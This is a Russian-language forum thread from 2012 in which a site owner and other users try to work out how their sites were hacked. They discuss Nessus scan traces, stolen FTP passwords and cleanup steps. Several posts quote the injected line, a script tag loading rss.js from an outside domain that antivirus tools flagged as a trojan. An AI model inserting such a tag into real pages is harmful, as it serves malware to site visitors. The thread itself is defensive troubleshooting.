Те кто знают - прошу помочь разобраться , как это было сделано . вот лог , где явно видно что копали много..
Кто опытен в таких делах - подскажите куда копать , что было сделано и так далее.
Спустя 23 минуты, 41 секунда (18.08.2012 - 12:19) killer8080 написал(а):
Следы сканирования от Nesus
Спустя 49 минут, 30 секунд (18.08.2012 - 13:08) andrey888 написал(а):
В итоге злоумышленнику удалось изменить один файл - индекс.пхп
Внутрь засунули это
<script src="http://sitescomp.cleansite.us/rss.js"></script>
Конечно сейчас подстрахуюсь и сделаю доступ к адмнке только нескольким IP адресам ..
Если кто еще что интересного может добавить и посоветовать , буду признателен .)
Внутрь засунули это
<script src="http://sitescomp.cleansite.us/rss.js"></script>
Конечно сейчас подстрахуюсь и сделаю доступ к адмнке только нескольким IP адресам ..
Если кто еще что интересного может добавить и посоветовать , буду признателен .)
Спустя 7 минут, 3 секунды (18.08.2012 - 13:16) killer8080 написал(а):
andrey888
одной чистки тут недостаточно. Надо выяснять через какую уязвимость был взлом, и закрывать её. Блокировки доступа к админке по ip может быть недостаточно. Так же нужно сменить все пароли, ко всему, и ограничить ftp доступ по ip адресам. Лучше всего в этой ситуации обратиться к специалистам по веб безопсности, и провести полную проверку (это само собой стоит денег, но оно того стоит
).
одной чистки тут недостаточно. Надо выяснять через какую уязвимость был взлом, и закрывать её. Блокировки доступа к админке по ip может быть недостаточно. Так же нужно сменить все пароли, ко всему, и ограничить ftp доступ по ip адресам. Лучше всего в этой ситуации обратиться к специалистам по веб безопсности, и провести полную проверку (это само собой стоит денег, но оно того стоит
). Спустя 6 часов, 30 минут, 58 секунд (18.08.2012 - 19:47) alex12060 написал(а):
залили шелл, пробрутили фтп, фиг знает, много причин
но я нашел подозрительную строку в логе:
Тут сервак ответил 200 кодом
но я нашел подозрительную строку в логе:
67.212.188.154 - - [07/Dec/2011:15:12:52 -0500] "GET /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0" 200 182 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
Тут сервак ответил 200 кодом
Спустя 2 часа, 22 минуты, 22 секунды (18.08.2012 - 22:09) andrey888 написал(а):
alex12060
Шел не залили.. я проверил но каким то образом поменяли один единственный файл, то есть его внутренний контент ..
А можно поподробнее ? Что все это значит .. строка .. ответ сервера 200 кодом .. ?
Спасибо.
Шел не залили.. я проверил но каким то образом поменяли один единственный файл, то есть его внутренний контент ..
А можно поподробнее ? Что все это значит .. строка .. ответ сервера 200 кодом .. ?
Спасибо.
Спустя 8 минут, 47 секунд (18.08.2012 - 22:18) Игорь_Vasinsky написал(а):
| Цитата |
| но каким то образом поменяли один единственный файл |
)) ты уже не контролируешь доступ ftp, для начала смени данные для доступа
| Цитата |
| /_vti_bin/shtml.dll/_vti_rpc |
200 - это значит сервер ответил положительно. попахивает шелом - вызвали через урл и запустили, нужно и скать дыры.
это вообще твоё?
| Цитата |
| /_vti_bin/shtml.dll/_vti_rpc |
Я сомневаюсь)
Спустя 11 минут, 44 секунды (18.08.2012 - 22:29) andrey888 написал(а):
Игорь_Vasinsky
Доступ поменян конечно же уже.
Ясно что дыры, вот только вопрос у меня в скрипте или у хостинга.. либюо у другого сайта который лежит там же где и мой и уже оттуда отталкивались, заливали шелл и так далее.
/_vti_bin/ - такой папки даже нет ..
Доступ поменян конечно же уже.
Ясно что дыры, вот только вопрос у меня в скрипте или у хостинга.. либюо у другого сайта который лежит там же где и мой и уже оттуда отталкивались, заливали шелл и так далее.
/_vti_bin/ - такой папки даже нет ..
Спустя 4 минуты, 23 секунды (18.08.2012 - 22:34) killer8080 написал(а):
| Цитата (andrey888 @ 18.08.2012 - 23:29) |
| /_vti_bin/ - такой папки даже нет .. |
Значит замели следы, ищи левые файлы.
Спустя 2 минуты, 30 секунд (18.08.2012 - 22:36) Игорь_Vasinsky написал(а):
проверь структурц=у сайта.
не плохо было бы иметь инфо о размерах файлов - сократило бы время поиска дыр.
смотри время модификации.
читай логи.
не плохо было бы иметь инфо о размерах файлов - сократило бы время поиска дыр.
смотри время модификации.
читай логи.
Спустя 9 минут, 46 секунд (18.08.2012 - 22:46) andrey888 написал(а):
Левых фалйлов нет ..
Единственный файл как я сказал был заменен и туда был поставлен
<script src="http://sitescomp.cleansite.us/rss.js"></script>
Больше ничего.. как ни странно.
Единственный файл как я сказал был заменен и туда был поставлен
<script src="http://sitescomp.cleansite.us/rss.js"></script>
Больше ничего.. как ни странно.
Спустя 23 часа, 42 секунды (19.08.2012 - 21:47) bodja написал(а):
| Цитата |
| Единственный файл как я сказал был заменен и туда был поставлен |
Этого достаточно ,что бы узнать пароли админки.
Спустя 54 минуты, 23 секунды (19.08.2012 - 22:41) andrey888 написал(а):
bodja Каким образом ??
Если бы скрипт был подставлен в мой файл - тогда ясен пень . Я ввожу логин пароль и по скрипту вся инфа идет третим лицам ..
Индекс страница была изменена и все что в ней было это ссылочка на скрипт .. То есть у меня не было даже поля или формы куда вводить логин и пароль , был просто белый экран и все..
Если бы скрипт был подставлен в мой файл - тогда ясен пень . Я ввожу логин пароль и по скрипту вся инфа идет третим лицам ..
Индекс страница была изменена и все что в ней было это ссылочка на скрипт .. То есть у меня не было даже поля или формы куда вводить логин и пароль , был просто белый экран и все..
Спустя 11 часов, 38 минут, 47 секунд (20.08.2012 - 10:20) Guest написал(а):
Извиняюсь, я тут не зарегена, но такая же проблема. За последние дни, практически во всех сайтах в конце появилась вот такая строка:
<script src="http://sitescomp.cleansite.us/rss.js"></script>
Послетители жалуются, что у них антивирусы выдают, что на сайте троян, а браузеры советуют не заходить на сайт. Разные пароли везде стоят, но на одном хостинге. Может хостинг виноват?
<script src="http://sitescomp.cleansite.us/rss.js"></script>
Послетители жалуются, что у них антивирусы выдают, что на сайте троян, а браузеры советуют не заходить на сайт. Разные пароли везде стоят, но на одном хостинге. Может хостинг виноват?
Спустя 1 минута, 35 секунд (20.08.2012 - 10:21) Guest написал(а):
Уточню, что такая строка появилась только в конце страницы index.php Сами страницы, в том числе и главная никак не пострадали, ничего не удалено с них. Добавлен этот скрипт и всё.
Спустя 22 минуты, 52 секунды (20.08.2012 - 10:44) Guest написал(а):
Один из сайтов вообще был на html, там не админки и ничего нет и в конце index.htm тоже появился такой скрипт. Может быть это не сайт, а на хостинге у них что-то? На другом хостинге у других сайтов ничего подобного не появилось.
Спустя 10 минут, 31 секунда (20.08.2012 - 10:55) inpost написал(а):
хостинг или вирус.
99% схем: берут пароль по фтп и заливают обновления. Лучшая защита - блокировка доступа по IP для пользователей.
99% схем: берут пароль по фтп и заливают обновления. Лучшая защита - блокировка доступа по IP для пользователей.
Спустя 1 час, 42 минуты, 1 секунда (20.08.2012 - 12:37) Guest написал(а):
Да, проблема в FTP ( Стала менять пароли ко всем сайтам, а мне вообще закрыли вход в аккаунты так как посчитали меня подозрительной личностью.
Спустя 7 дней, 8 часов, 53 минуты, 20 секунд (27.08.2012 - 21:30) andrey888 написал(а):
Guest ты на каком хостинге если не секрет ?
_____________
Прогноз на следующие 5 лет : Россия, Китай - две величайшие державы.
США в Ж*пе. Справедливость восторжествует. )